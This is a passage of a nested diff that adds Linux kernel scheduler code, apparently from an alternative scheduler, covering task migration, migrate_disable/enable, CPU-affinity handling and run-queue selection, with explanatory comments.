-+void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
-+{
-+#ifdef CONFIG_SCHED_DEBUG
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * We should never call set_task_cpu() on a blocked task,
-+	 * ttwu() will sort out the placement.
-+	 */
-+	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
-+
-+#ifdef CONFIG_LOCKDEP
-+	/*
-+	 * The caller should hold either p->pi_lock or rq->lock, when changing
-+	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
-+	 *
-+	 * sched_move_task() holds both and thus holding either pins the cgroup,
-+	 * see task_group().
-+	 */
-+	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
-+				      lockdep_is_held(&task_rq(p)->lock)));
-+#endif
-+	/*
-+	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
-+	 */
-+	WARN_ON_ONCE(!cpu_online(new_cpu));
-+
-+	WARN_ON_ONCE(is_migration_disabled(p));
-+#endif
-+	if (task_cpu(p) == new_cpu)
-+		return;
-+	trace_sched_migrate_task(p, new_cpu);
-+	rseq_migrate(p);
-+	perf_event_task_migrate(p);
-+
-+	__set_task_cpu(p, new_cpu);
-+}
-+
-+#define MDF_FORCE_ENABLED	0x80
-+
-+static void
-+__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	/*
-+	 * This here violates the locking rules for affinity, since we're only
-+	 * supposed to change these variables while holding both rq->lock and
-+	 * p->pi_lock.
-+	 *
-+	 * HOWEVER, it magically works, because ttwu() is the only code that
-+	 * accesses these variables under p->pi_lock and only does so after
-+	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
-+	 * before finish_task().
-+	 *
-+	 * XXX do further audits, this smells like something putrid.
-+	 */
-+	SCHED_WARN_ON(!p->on_cpu);
-+	p->cpus_ptr = new_mask;
-+}
-+
-+void migrate_disable(void)
-+{
-+	struct task_struct *p = current;
-+	int cpu;
-+
-+	if (p->migration_disabled) {
-+		p->migration_disabled++;
-+		return;
-+	}
-+
-+	preempt_disable();
-+	cpu = smp_processor_id();
-+	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
-+		cpu_rq(cpu)->nr_pinned++;
-+		p->migration_disabled = 1;
-+		p->migration_flags &= ~MDF_FORCE_ENABLED;
-+
-+		/*
-+		 * Violates locking rules! see comment in __do_set_cpus_ptr().
-+		 */
-+		if (p->cpus_ptr == &p->cpus_mask)
-+			__do_set_cpus_ptr(p, cpumask_of(cpu));
-+	}
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_disable);
-+
-+void migrate_enable(void)
-+{
-+	struct task_struct *p = current;
-+
-+	if (0 == p->migration_disabled)
-+		return;
-+
-+	if (p->migration_disabled > 1) {
-+		p->migration_disabled--;
-+		return;
-+	}
-+
-+	if (WARN_ON_ONCE(!p->migration_disabled))
-+		return;
-+
-+	/*
-+	 * Ensure stop_task runs either before or after this, and that
-+	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
-+	 */
-+	preempt_disable();
-+	/*
-+	 * Assumption: current should be running on allowed cpu
-+	 */
-+	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
-+	if (p->cpus_ptr != &p->cpus_mask)
-+		__do_set_cpus_ptr(p, &p->cpus_mask);
-+	/*
-+	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
-+	 * regular cpus_mask, otherwise things that race (eg.
-+	 * select_fallback_rq) get confused.
-+	 */
-+	barrier();
-+	p->migration_disabled = 0;
-+	this_rq()->nr_pinned--;
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_enable);
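-+
-+/*
-+ * Typical (hypothetical) usage of the pair above: the section between the
-+ * calls may still be preempted but will not be migrated off this CPU, and
-+ * the calls nest:
-+ *
-+ *   migrate_disable();
-+ *   ptr = this_cpu_ptr(&my_percpu_data);  // my_percpu_data is illustrative;
-+ *   ...                                   // the pointer stays this CPU's
-+ *   migrate_enable();
-+ */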
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return rq->nr_pinned;
-+}
-+
-+/*
-+ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
-+ * __set_cpus_allowed_ptr() and select_fallback_rq().
-+ */
-+static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
-+{
-+	/* When not in the task's cpumask, no point in looking further. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/* migrate_disabled() must be allowed to finish. */
-+	if (is_migration_disabled(p))
-+		return cpu_online(cpu);
-+
-+	/* Non-kernel threads are not allowed during either online or offline. */
-+	if (!(p->flags & PF_KTHREAD))
-+		return cpu_active(cpu) && task_cpu_possible(cpu, p);
-+
-+	/* KTHREAD_IS_PER_CPU is always allowed. */
-+	if (kthread_is_per_cpu(p))
-+		return cpu_online(cpu);
-+
-+	/* Regular kernel threads don't get to stay during offline. */
-+	if (cpu_dying(cpu))
-+		return false;
-+
-+	/* But are allowed during online. */
-+	return cpu_online(cpu);
-+}
-+
-+/*
-+ * This is how migration works:
-+ *
-+ * 1) we invoke migration_cpu_stop() on the target CPU using
-+ *    stop_one_cpu().
-+ * 2) stopper starts to run (implicitly forcing the migrated thread
-+ *    off the CPU)
-+ * 3) it checks whether the migrated task is still in the wrong runqueue.
-+ * 4) if it's in the wrong runqueue then the migration thread removes
-+ *    it and puts it into the right queue.
-+ * 5) stopper completes and stop_one_cpu() returns and the migration
-+ *    is done.
-+ */
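-+
-+/*
-+ * A minimal sketch of a caller driving the steps above (this is what
-+ * affine_move_task() below effectively does):
-+ *
-+ *   struct migration_arg arg = { p, dest_cpu };
-+ *   stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
-+ */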
-+
-+/*
-+ * move_queued_task - move a queued task to new rq.
-+ *
-+ * Returns (locked) new rq. Old rq's lock is released.
-+ */
-+static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
-+				   new_cpu)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
-+	dequeue_task(p, rq, 0);
-+	update_sched_preempt_mask(rq);
-+	set_task_cpu(p, new_cpu);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rq = cpu_rq(new_cpu);
-+
-+	raw_spin_lock(&rq->lock);
-+	WARN_ON_ONCE(task_cpu(p) != new_cpu);
-+	sched_task_sanity_check(p, rq);
-+	enqueue_task(p, rq, 0);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+	check_preempt_curr(rq);
-+
-+	return rq;
-+}
-+
-+struct migration_arg {
-+	struct task_struct *task;
-+	int dest_cpu;
-+};
-+
-+/*
-+ * Move (not current) task off this CPU, onto the destination CPU. We're doing
-+ * this because either it can't run here any more (set_cpus_allowed()
-+ * away from this CPU, or CPU going down), or because we're
-+ * attempting to rebalance this task on exec (sched_exec).
-+ *
-+ * So we race with normal scheduler movements, but that's OK, as long
-+ * as the task is no longer on this CPU.
-+ */
-+static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
-+				 dest_cpu)
-+{
-+	/* Affinity changed (again). */
-+	if (!is_cpu_allowed(p, dest_cpu))
-+		return rq;
-+
-+	update_rq_clock(rq);
-+	return move_queued_task(rq, p, dest_cpu);
-+}
-+
-+/*
-+ * migration_cpu_stop - this will be executed by a highprio stopper thread
-+ * and performs thread migration by bumping thread off CPU then
-+ * 'pushing' onto another runqueue.
-+ */
-+static int migration_cpu_stop(void *data)
-+{
-+	struct migration_arg *arg = data;
-+	struct task_struct *p = arg->task;
-+	struct rq *rq = this_rq();
-+	unsigned long flags;
-+
-+	/*
-+	 * The original target CPU might have gone down and we might
-+	 * be on another CPU but it doesn't matter.
-+	 */
-+	local_irq_save(flags);
-+	/*
-+	 * We need to explicitly wake pending tasks before running
-+	 * __migrate_task() such that we will not miss enforcing cpus_ptr
-+	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
-+	 */
-+	flush_smp_call_function_queue();
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+	/*
-+	 * If task_rq(p) != rq, it cannot be migrated here, because we're
-+	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
-+	 * we're holding p->pi_lock.
-+	 */
-+	if (task_rq(p) == rq && task_on_rq_queued(p))
-+		rq = __migrate_task(rq, p, arg->dest_cpu);
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	return 0;
-+}
-+
-+static inline void
-+set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	cpumask_copy(&p->cpus_mask, new_mask);
-+	p->nr_cpus_allowed = cpumask_weight(new_mask);
-+}
-+
-+static void
-+__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	lockdep_assert_held(&p->pi_lock);
-+	set_cpus_allowed_common(p, new_mask);
-+}
-+
-+void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	__do_set_cpus_allowed(p, new_mask);
-+}
-+
-+int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
-+		      int node)
-+{
-+	if (!src->user_cpus_ptr)
-+		return 0;
-+
-+	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
-+	if (!dst->user_cpus_ptr)
-+		return -ENOMEM;
-+
-+	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
-+	return 0;
-+}
-+
-+static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = NULL;
-+
-+	swap(p->user_cpus_ptr, user_mask);
-+
-+	return user_mask;
-+}
-+
-+void release_user_cpus_ptr(struct task_struct *p)
-+{
-+	kfree(clear_user_cpus_ptr(p));
-+}
-+
-+#endif
-+
-+/**
-+ * task_curr - is this task currently executing on a CPU?
-+ * @p: the task in question.
-+ *
-+ * Return: 1 if the task is currently executing. 0 otherwise.
-+ */
-+inline int task_curr(const struct task_struct *p)
-+{
-+	return cpu_curr(task_cpu(p)) == p;
-+}
-+
-+#ifdef CONFIG_SMP
-+/*
-+ * wait_task_inactive - wait for a thread to unschedule.
-+ *
-+ * Wait for the thread to block in any of the states set in @match_state.
-+ * If it changes, i.e. @p might have woken up, then return zero.  When we
-+ * succeed in waiting for @p to be off its CPU, we return a positive number
-+ * (its total switch count).  If a second call a short while later returns the
-+ * same number, the caller can be sure that @p has remained unscheduled the
-+ * whole time.
-+ *
-+ * The caller must ensure that the task *will* unschedule sometime soon,
-+ * else this function might spin for a *long* time. This function can't
-+ * be called with interrupts off, or it may introduce deadlock with
-+ * smp_call_function() if an IPI is sent by the same process we are
-+ * waiting to become inactive.
-+ */
-+unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
-+{
-+	unsigned long flags;
-+	bool running, on_rq;
-+	unsigned long ncsw;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+
-+		/*
-+		 * If the task is actively running on another CPU
-+		 * still, just relax and busy-wait without holding
-+		 * any locks.
-+		 *
-+		 * NOTE! Since we don't hold any locks, it's not
-+		 * even sure that "rq" stays as the right runqueue!
-+		 * But we don't care, since this will return false
-+		 * if the runqueue has changed and p is actually now
-+		 * running somewhere else!
-+		 */
-+		while (task_on_cpu(p) && p == rq->curr) {
-+			if (!(READ_ONCE(p->__state) & match_state))
-+				return 0;
-+			cpu_relax();
-+		}
-+
-+		/*
-+		 * Ok, time to look more closely! We need the rq
-+		 * lock now, to be *sure*. If we're wrong, we'll
-+		 * just go back and repeat.
-+		 */
-+		task_access_lock_irqsave(p, &lock, &flags);
-+		trace_sched_wait_task(p);
-+		running = task_on_cpu(p);
-+		on_rq = p->on_rq;
-+		ncsw = 0;
-+		if (READ_ONCE(p->__state) & match_state)
-+			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
-+		task_access_unlock_irqrestore(p, lock, &flags);
-+
-+		/*
-+		 * If it changed from the expected state, bail out now.
-+		 */
-+		if (unlikely(!ncsw))
-+			break;
-+
-+		/*
-+		 * Was it really running after all now that we
-+		 * checked with the proper locks actually held?
-+		 *
-+		 * Oops. Go back and try again..
-+		 */
-+		if (unlikely(running)) {
-+			cpu_relax();
-+			continue;
-+		}
-+
-+		/*
-+		 * It's not enough that it's not actively running,
-+		 * it must be off the runqueue _entirely_, and not
-+		 * preempted!
-+		 *
-+		 * So if it was still runnable (but just not actively
-+		 * running right now), it's preempted, and we should
-+		 * yield - it could be a while.
-+		 */
-+		if (unlikely(on_rq)) {
-+			ktime_t to = NSEC_PER_SEC / HZ;
-+
-+			set_current_state(TASK_UNINTERRUPTIBLE);
-+			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
-+			continue;
-+		}
-+
-+		/*
-+		 * Ahh, all good. It wasn't running, and it wasn't
-+		 * runnable, which means that it will never become
-+		 * running in the future either. We're all done!
-+		 */
-+		break;
-+	}
-+
-+	return ncsw;
-+}
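-+
-+/*
-+ * Sketch of the double-call pattern described above: if a second call
-+ * returns the same non-zero switch count, @p never ran in between.
-+ *
-+ *   ncsw = wait_task_inactive(p, TASK_UNINTERRUPTIBLE);
-+ *   ...
-+ *   if (ncsw && wait_task_inactive(p, TASK_UNINTERRUPTIBLE) == ncsw)
-+ *           ;  // p stayed off the CPU the whole time
-+ */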
-+
-+/**
-+ * kick_process - kick a running thread to enter/exit the kernel
-+ * @p: the to-be-kicked thread
-+ *
-+ * Cause a process which is running on another CPU to enter
-+ * kernel-mode, without any delay. (to get signals handled.)
-+ *
-+ * NOTE: this function doesn't have to take the runqueue lock,
-+ * because all it wants to ensure is that the remote task enters
-+ * the kernel. If the IPI races and the task has been migrated
-+ * to another CPU then no harm is done and the purpose has been
-+ * achieved as well.
-+ */
-+void kick_process(struct task_struct *p)
-+{
-+	int cpu;
-+
-+	preempt_disable();
-+	cpu = task_cpu(p);
-+	if ((cpu != smp_processor_id()) && task_curr(p))
-+		smp_send_reschedule(cpu);
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(kick_process);
-+
-+/*
-+ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
-+ *
-+ * A few notes on cpu_active vs cpu_online:
-+ *
-+ *  - cpu_active must be a subset of cpu_online
-+ *
-+ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
-+ *    see __set_cpus_allowed_ptr(). At this point the newly online
-+ *    CPU isn't yet part of the sched domains, and balancing will not
-+ *    see it.
-+ *
-+ *  - on cpu-down we clear cpu_active() to mask the sched domains and
-+ *    prevent the load balancer from placing new tasks on the
-+ *    to-be-removed CPU. Existing tasks will remain running there and
-+ *    will be taken off.
-+ *
-+ * This means that fallback selection must not select !active CPUs.
-+ * And can assume that any active CPU must be online. Conversely
-+ * select_task_rq() below may allow selection of !active CPUs in order
-+ * to satisfy the above rules.
-+ */
-+static int select_fallback_rq(int cpu, struct task_struct *p)
-+{
-+	int nid = cpu_to_node(cpu);
-+	const struct cpumask *nodemask = NULL;
-+	enum { cpuset, possible, fail } state = cpuset;
-+	int dest_cpu;
-+
-+	/*
-+	 * If the node that the CPU is on has been offlined, cpu_to_node()
-+	 * will return -1. There is no CPU on the node, and we should
-+	 * select a CPU on another node.
-+	 */
-+	if (nid != -1) {
-+		nodemask = cpumask_of_node(nid);
-+
-+		/* Look for allowed, online CPU in same node. */
-+		for_each_cpu(dest_cpu, nodemask) {
-+			if (is_cpu_allowed(p, dest_cpu))
-+				return dest_cpu;
-+		}
-+	}
-+
-+	for (;;) {
-+		/* Any allowed, online CPU? */
-+		for_each_cpu(dest_cpu, p->cpus_ptr) {
-+			if (!is_cpu_allowed(p, dest_cpu))
-+				continue;
-+			goto out;
-+		}
-+
-+		/* No more Mr. Nice Guy. */
-+		switch (state) {
-+		case cpuset:
-+			if (cpuset_cpus_allowed_fallback(p)) {
-+				state = possible;
-+				break;
-+			}
-+			fallthrough;
-+		case possible:
-+			/*
-+			 * XXX When called from select_task_rq() we only
-+			 * hold p->pi_lock and again violate locking order.
-+			 *
-+			 * More yuck to audit.
-+			 */
-+			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
-+			state = fail;
-+			break;
-+
-+		case fail:
-+			BUG();
-+			break;
-+		}
-+	}
-+
-+out:
-+	if (state != cpuset) {
-+		/*
-+		 * Don't tell them about moving exiting tasks or
-+		 * kernel threads (both mm NULL), since they never
-+		 * leave the kernel.
-+		 */
-+		if (p->mm && printk_ratelimit()) {
-+			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
-+					task_pid_nr(p), p->comm, cpu);
-+		}
-+	}
-+
-+	return dest_cpu;
-+}
-+
-+static inline void
-+sched_preempt_mask_flush(cpumask_t *mask, int prio)
-+{
-+	int cpu;
-+
-+	cpumask_copy(mask, sched_idle_mask);
-+
-+	for_each_cpu_not(cpu, mask) {
-+		if (prio < cpu_rq(cpu)->prio)
-+			cpumask_set_cpu(cpu, mask);
-+	}
-+}
-+
-+static inline int
-+preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
-+{
-+	int task_prio = task_sched_prio(p);
-+	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
-+	int pr = atomic_read(&sched_prio_record);
-+
-+	if (pr != task_prio) {
-+		sched_preempt_mask_flush(mask, task_prio);
-+		atomic_set(&sched_prio_record, task_prio);
-+	}
-+
-+	return cpumask_and(preempt_mask, allow_mask, mask);
-+}
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	cpumask_t allow_mask, mask;
-+
-+	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
-+		return select_fallback_rq(task_cpu(p), p);
-+
-+	if (
-+#ifdef CONFIG_SCHED_SMT
-+	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
-+#endif
-+	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
-+	    preempt_mask_check(p, &allow_mask, &mask))
-+		return best_mask_cpu(task_cpu(p), &mask);
-+
-+	return best_mask_cpu(task_cpu(p), &allow_mask);
-+}
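-+
-+/*
-+ * Reading select_task_rq() above: candidate masks are tried in order of
-+ * decreasing preference -- a fully idle SMT sibling group (when
-+ * CONFIG_SCHED_SMT), then any idle CPU, then CPUs whose current task @p
-+ * can preempt, and finally any allowed CPU; best_mask_cpu() then picks
-+ * the CPU topologically closest to task_cpu(p) within the winning mask.
-+ */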
-+
-+void sched_set_stop_task(int cpu, struct task_struct *stop)
-+{
-+	static struct lock_class_key stop_pi_lock;
-+	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
-+	struct sched_param start_param = { .sched_priority = 0 };
-+	struct task_struct *old_stop = cpu_rq(cpu)->stop;
-+
-+	if (stop) {
-+		/*
-+		 * Make it appear like a SCHED_FIFO task; it's something
-+		 * userspace knows about and won't get confused about.
-+		 *
-+		 * Also, it will make PI more or less work without too
-+		 * much confusion -- but then, stop work should not
-+		 * rely on PI working anyway.
-+		 */
-+		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
-+
-+		/*
-+		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
-+		 * adjust the effective priority of a task. As a result,
-+		 * rt_mutex_setprio() can trigger (RT) balancing operations,
-+		 * which can then trigger wakeups of the stop thread to push
-+		 * around the current task.
-+		 *
-+		 * The stop task itself will never be part of the PI-chain, it
-+		 * never blocks, therefore that ->pi_lock recursion is safe.
-+		 * Tell lockdep about this by placing the stop->pi_lock in its
-+		 * own class.
-+		 */
-+		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
-+	}
-+
-+	cpu_rq(cpu)->stop = stop;
-+
-+	if (old_stop) {
-+		/*
-+		 * Reset it back to a normal scheduling policy so that
-+		 * it can die in pieces.
-+		 */
-+		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
-+	}
-+}
-+
-+static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
-+			    raw_spinlock_t *lock, unsigned long irq_flags)
-+{
-+	/* Can the task run on the task's current CPU? If so, we're done */
-+	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
-+		if (p->migration_disabled) {
-+			if (likely(p->cpus_ptr != &p->cpus_mask))
-+				__do_set_cpus_ptr(p, &p->cpus_mask);
-+			p->migration_disabled = 0;
-+			p->migration_flags |= MDF_FORCE_ENABLED;
-+			/* When p is migrate_disabled, rq->lock should be held */
-+			rq->nr_pinned--;
-+		}
-+
-+		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
-+			struct migration_arg arg = { p, dest_cpu };
-+
-+			/* Need help from migration thread: drop lock and wait. */
-+			__task_access_unlock(p, lock);
-+			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
-+			return 0;
-+		}
-+		if (task_on_rq_queued(p)) {
-+			/*
-+			 * OK, since we're going to drop the lock immediately
-+			 * afterwards anyway.
-+			 */
-+			update_rq_clock(rq);
-+			rq = move_queued_task(rq, p, dest_cpu);
-+			lock = &rq->lock;
-+		}
-+	}
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	return 0;
-+}
-+
-+static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
-+					 const struct cpumask *new_mask,
-+					 u32 flags,
-+					 struct rq *rq,
-+					 raw_spinlock_t *lock,
-+					 unsigned long irq_flags)
-+{
-+	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
-+	const struct cpumask *cpu_valid_mask = cpu_active_mask;
-+	bool kthread = p->flags & PF_KTHREAD;
-+	struct cpumask *user_mask = NULL;
-+	int dest_cpu;
-+	int ret = 0;
-+
-+	if (kthread || is_migration_disabled(p)) {
-+		/*
-+		 * Kernel threads are allowed on online && !active CPUs,
-+		 * however, during cpu-hot-unplug, even these might get pushed
-+		 * away if not KTHREAD_IS_PER_CPU.
-+		 *
-+		 * Specifically, migration_disabled() tasks must not fail the
-+		 * cpumask_any_and_distribute() pick below, esp. so on
-+		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
-+		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
-+		 */
-+		cpu_valid_mask = cpu_online_mask;
-+	}
-+
-+	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	/*
-+	 * Must re-check here, to close a race against __kthread_bind(),
-+	 * sched_setaffinity() is not guaranteed to observe the flag.
-+	 */
-+	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	if (cpumask_equal(&p->cpus_mask, new_mask))
-+		goto out;
-+
-+	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
-+	if (dest_cpu >= nr_cpu_ids) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	__do_set_cpus_allowed(p, new_mask);
-+
-+	if (flags & SCA_USER)
-+		user_mask = clear_user_cpus_ptr(p);
-+
-+	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
-+
-+	kfree(user_mask);
-+
-+	return ret;
-+
-+out:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+
-+	return ret;
-+}
-+
-+/*
-+ * Change a given task's CPU affinity. Migrate the thread to a
-+ * proper CPU and schedule it away if the CPU it's executing on
-+ * is removed from the allowed bitmask.
-+ *
-+ * NOTE: the caller must have a valid reference to the task, the
-+ * task must not exit() & deallocate itself prematurely. The
-+ * call is not atomic; no spinlocks may be held.
-+ */
-+static int __set_cpus_allowed_ptr(struct task_struct *p,
-+				  const struct cpumask *new_mask, u32 flags)
-+{
-+	unsigned long irq_flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
-+}
-+
-+int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	return __set_cpus_allowed_ptr(p, new_mask, 0);
-+}
-+EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
-+
-+/*
-+ * Change a given task's CPU affinity to the intersection of its current
-+ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
-+ * and pointing @p->user_cpus_ptr to a copy of the old mask.
-+ * If the resulting mask is empty, leave the affinity unchanged and return
-+ * -EINVAL.
-+ */
-+static int restrict_cpus_allowed_ptr(struct task_struct *p,
-+				     struct cpumask *new_mask,
-+				     const struct cpumask *subset_mask)
-+{
-+	struct cpumask *user_mask = NULL;
-+	unsigned long irq_flags;
-+	raw_spinlock_t *lock;
-+	struct rq *rq;
-+	int err;
-+
-+	if (!p->user_cpus_ptr) {
-+		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
-+		if (!user_mask)
-+			return -ENOMEM;
-+	}
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
-+		err = -EINVAL;
-+		goto err_unlock;
-+	}
-+
-+	/*
-+	 * We're about to butcher the task affinity, so keep track of what
-+	 * the user asked for in case we're able to restore it later on.
-+	 */
-+	if (user_mask) {
-+		cpumask_copy(user_mask, p->cpus_ptr);
-+		p->user_cpus_ptr = user_mask;
-+	}
-+
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
-+
-+err_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	kfree(user_mask);
-+	return err;
-+}
-+
-+/*
-+ * Restrict the CPU affinity of task @p so that it is a subset of
-+ * task_cpu_possible_mask() and point @p->user_cpus_ptr to a copy of the
-+ * old affinity mask. If the resulting mask is empty, we warn and walk
-+ * up the cpuset hierarchy until we find a suitable mask.
-+ */
-+void force_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	cpumask_var_t new_mask;
-+	const struct cpumask *override_mask = task_cpu_possible_mask(p);
-+
-+	alloc_cpumask_var(&new_mask, GFP_KERNEL);
-+
-+	/*
-+	 * __migrate_task() can fail silently in the face of concurrent
-+	 * offlining of the chosen destination CPU, so take the hotplug
-+	 * lock to ensure that the migration succeeds.
-+	 */
-+	cpus_read_lock();
-+	if (!cpumask_available(new_mask))
-+		goto out_set_mask;
-+
-+	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
-+		goto out_free_mask;
-+
-+	/*
-+	 * We failed to find a valid subset of the affinity mask for the
-+	 * task, so override it based on its cpuset hierarchy.
-+	 */
-+	cpuset_cpus_allowed(p, new_mask);
-+	override_mask = new_mask;
-+
-+out_set_mask:
-+	if (printk_ratelimit()) {
-+		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
-+				task_pid_nr(p), p->comm,
-+				cpumask_pr_args(override_mask));
-+	}
-+
-+	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
-+out_free_mask:
-+	cpus_read_unlock();
-+	free_cpumask_var(new_mask);
-+}
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
-+
-+/*
-+ * Restore the affinity of a task @p which was previously restricted by a
-+ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
-+ * @p->user_cpus_ptr.
-+ *
-+ * It is the caller's responsibility to serialise this with any calls to
-+ * force_compatible_cpus_allowed_ptr(@p).
-+ */
-+void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = p->user_cpus_ptr;
-+	unsigned long flags;
-+
-+	/*
-+	 * Try to restore the old affinity mask. If this fails, then
-+	 * we free the mask explicitly to avoid it being inherited across
-+	 * a subsequent fork().
-+	 */
-+	if (!user_mask || !__sched_setaffinity(p, user_mask))
-+		return;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	user_mask = clear_user_cpus_ptr(p);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	kfree(user_mask);
-+}
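-+
-+/*
-+ * The two calls above are designed to be used as a bracketing pair, e.g.
-+ * (hypothetically) around running code that can only execute on a subset
-+ * of CPUs on an asymmetric system:
-+ *
-+ *   force_compatible_cpus_allowed_ptr(p);  // clamp to task_cpu_possible_mask()
-+ *   ... run the restricted code ...
-+ *   relax_compatible_cpus_allowed_ptr(p);  // restore the user's mask
-+ */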
-+
-+#else /* CONFIG_SMP */
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+static inline int
-+__set_cpus_allowed_ptr(struct task_struct *p,
-+		       const struct cpumask *new_mask, u32 flags)
-+{
-+	return set_cpus_allowed_ptr(p, new_mask);
-+}
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return false;
-+}
-+
-+#endif /* !CONFIG_SMP */
-+
-+static void
-+ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq;
-+
-+	if (!schedstat_enabled())
-+		return;
-+
-+	rq = this_rq();
-+
-+#ifdef CONFIG_SMP
-+	if (cpu == rq->cpu) {
-+		__schedstat_inc(rq->ttwu_local);
-+		__schedstat_inc(p->stats.nr_wakeups_local);
-+	} else {
-+		/*
